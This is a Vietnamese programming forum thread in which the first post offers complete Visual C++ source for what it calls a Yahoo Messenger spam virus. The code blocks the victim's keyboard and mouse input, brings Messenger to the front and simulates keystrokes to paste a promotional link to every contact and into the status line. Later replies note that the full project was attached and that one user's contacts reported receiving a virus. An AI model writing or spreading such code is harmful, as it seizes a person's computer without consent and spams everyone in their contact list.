Từ 1 tới 3 trên tổng số 3 kết quả

Đề tài: Source code virus spam yahoo viết bằng VC++

 1. #1
  Ngày gia nhập
  12 2006
  Nơi ở
  tphcm
  Bài viết
  7

  Mặc định Source code virus spam yahoo viết bằng VC++

  Giới thệu với các bạn phương thức Spam và phát tán virus trong yahoo messenger bằng lập trình c++, nó rất là đơn giản và dể hiểu, sữ dùng hàm API keybd_event là chủ yếu. Sau đây mô tả sơ lược về hàm keybd_event :

  + Cấu trúc :
  Visual C++ Code:
  1. VOID keybd_event(
  2.   BYTE bVk,           // virtual-key code
  3.   BYTE bScan,         // hardware scan code
  4.   DWORD dwFlags,      // flags specifying various function options
  5.   DWORD dwExtraInfo   // additional data associated with keystroke
  6. );

  + Thông số :
  bVk : mã phím ảo của phím cần tạo sự kiện hoặc nhả.
  bScan : để dành lập thành 0.
  dwFlags : kết hơp các cờ sau để định rõ hình thức nhập bàn phím để tổng hơp, KEYEVENTF_EXTENDEDKEY là thêm tiếp đầu ngữ có giá trị &HE0 vào mả quét, KEYEVENTF_KEYUP là phím xác định bằng tham số bVk đang được nhả ra. Nếu cờ này không được chỉ rõ thì phím đang được ấn xuống
  dwExtraInfo : Một giá tr phụ 32 bit tương ứng với sự kiện bàn phím

  Visual C++ Code:
  1. #include "Winable.h"
  2. #include "windows.h"
  3. int APIENTRY WinMain(HINSTANCE hInstance,
  4.                      HINSTANCE hPrevInstance,
  5.                      LPSTR     lpCmdLine,
  6.                      int       nCmdShow)
  7. {
  8.  
  9.  // Bước đầu tiên tìm xem có yahoo messenger đang run không
  10.  HWND YahooM;
  11.  YahooM = FindWindow("YahooBuddyMain",NULL);
  12.  if (YahooM != NULL)  // nếu tồn tại, ta thực hiện các bước sau
  13.  {
  14.   BlockInput(1); khoá bàn phím
  15.   ShowWindow(YahooM,SW_RESTORE); //hiện yahoo Messenger trên nền background
  16.   SetForegroundWindow(YahooM);
  17.  
  18.   // Tiếp theo ta Lấy danh sách các nick trong list yahoo
  19.   keybd_event(VK_CONTROL,NULL,NULL,NULL);
  20.   keybd_event(77,NULL,NULL,NULL);
  21.   keybd_event(77,NULL,KEYEVENTF_KEYUP,NULL);
  22.   keybd_event(VK_CONTROL,NULL,KEYEVENTF_KEYUP,NULL);
  23.   keybd_event(VK_DOWN,NULL,NULL,NULL);
  24.   keybd_event(VK_DOWN,NULL,KEYEVENTF_KEYUP,NULL);
  25.   keybd_event(VK_SHIFT,NULL,NULL,NULL);
  26.   keybd_event(VK_END,NULL,KEYEVENTF_EXTENDEDKEY,NULL);
  27.   keybd_event(VK_END,NULL,KEYEVENTF_KEYUP,NULL);
  28.   keybd_event(VK_SHIFT,NULL,KEYEVENTF_KEYUP,NULL);
  29.   keybd_event(13,NULL,NULL,NULL);
  30.   keybd_event(13,NULL,KEYEVENTF_KEYUP,NULL);
  31.   HGLOBAL hText;
  32.   OpenClipboard(0);
  33.   EmptyClipboard();
  34.   char pText[100]="welcome to toanthang.spaces.live.com"; // ví dụ nội dung cần Spam  
  35.   hText=GlobalAlloc(GMEM_DDESHARE|GMEM_MOVEABLE,strlen(pText)+1);
  36.  
  37.   char *pstr=(char *)GlobalLock((hText));
  38.   strcpy(pstr,pText);
  39.   GlobalUnlock(hText);
  40.  
  41.   SetClipboardData(CF_TEXT,hText); //đặt nội dung vào bộ nhớ
  42.  
  43.   //Sau đó Send nội dung cần Spam cho tất cả các nick trong list yahoo messenger
  44.   keybd_event(VK_CONTROL,NULL,NULL,NULL);
  45.   keybd_event(86,NULL,NULL,NULL);
  46.   keybd_event(86,NULL,KEYEVENTF_KEYUP,NULL);
  47.   keybd_event(VK_CONTROL,NULL,KEYEVENTF_KEYUP,NULL);
  48.   keybd_event(13,NULL,NULL,NULL);
  49.   keybd_event(13,NULL,KEYEVENTF_KEYUP,NULL);
  50.  
  51.   // Bước tiếp theo tạo nội dung Spam trong Status cua Yahoo Messener
  52.   keybd_event(VK_MENU,NULL,NULL,NULL);
  53.   keybd_event(77,NULL,NULL,NULL);
  54.   keybd_event(77,NULL,KEYEVENTF_KEYUP,NULL);
  55.   keybd_event(VK_MENU,NULL,KEYEVENTF_KEYUP,NULL);
  56.   keybd_event(77,NULL,NULL,NULL);
  57.   keybd_event(77,NULL,KEYEVENTF_KEYUP,NULL);
  58.   keybd_event(77,NULL,NULL,NULL);
  59.   keybd_event(77,NULL,KEYEVENTF_KEYUP,NULL);
  60.   keybd_event(VK_CONTROL,NULL,NULL,NULL);
  61.   keybd_event(86,NULL,NULL,NULL);
  62.   keybd_event(86,NULL,KEYEVENTF_KEYUP,NULL);
  63.   keybd_event(VK_CONTROL,NULL,KEYEVENTF_KEYUP,NULL);
  64.   keybd_event(13,NULL,NULL,NULL);
  65.   keybd_event(13,NULL,KEYEVENTF_KEYUP,NULL);
  66.   CloseClipboard();
  67.   GlobalUnlock(hText);
  68.  }
  69.  BlockInput(0);
  70.  return 0;
  71. }
  Đã được chỉnh sửa lần cuối bởi AlexF : 19-05-2009 lúc 02:04 PM. Lý do: Hướng dẫn thì phải đủ source

 2. #2
  Ngày gia nhập
  02 2008
  Bài viết
  1,009

  Viết bài hướng dẫn thì viết cho đủ đừng nên viết 1 nửa và quảng cáo 1 nửa nhé

  up source chỉnh lại trên VC++ 6.0 cho các bạn
  Attached Files Attached Files

 3. #3
  Ngày gia nhập
  03 2009
  Bài viết
  6

  hức hức, em biên dịch chạy thử... Yahoo em treo luôn, người ta nhắn tin lại bảo vi rut' :(

Các đề tài tương tự

 1. Sâu đục yahoo viết bằng VC++, mới chế xong code
  Gửi bởi hoanglinh9466 trong diễn đàn Dự án & Source code VC++
  Trả lời: 21
  Bài viết cuối: 26-08-2012, 11:38 PM
 2. Chương trình tổng hợp các bài viết hay về C# [Source Code ]
  Gửi bởi tesulakata trong diễn đàn Dự án & Source code C#, ASP.NET
  Trả lời: 19
  Bài viết cuối: 12-03-2012, 09:03 AM
 3. Code virus viết trên VC++ hoạt động như thế nào?
  Gửi bởi luongtankhang123 trong diễn đàn Lập trình Virus & Anti-Virus
  Trả lời: 9
  Bài viết cuối: 01-02-2012, 09:16 AM
 4. Viết virus khóa chuột - Lập trình virus trên C
  Gửi bởi AlexF trong diễn đàn Lập trình Virus & Anti-Virus
  Trả lời: 21
  Bài viết cuối: 03-07-2010, 09:57 AM
 5. Source code quản lý nhân sự viết bằng C
  Gửi bởi Kevin Hoang trong diễn đàn Thủ thuật, Tutorials và Mã nguồn C/C++/C++0x
  Trả lời: 0
  Bài viết cuối: 19-08-2006, 12:01 AM

Quyền hạn của bạn

 • Bạn không thể gửi đề tài mới
 • Bạn không thể gửi bài trả lời
 • Bạn không thể gửi các đính kèm
 • Bạn không thể chỉnh sửa bài viết của bạn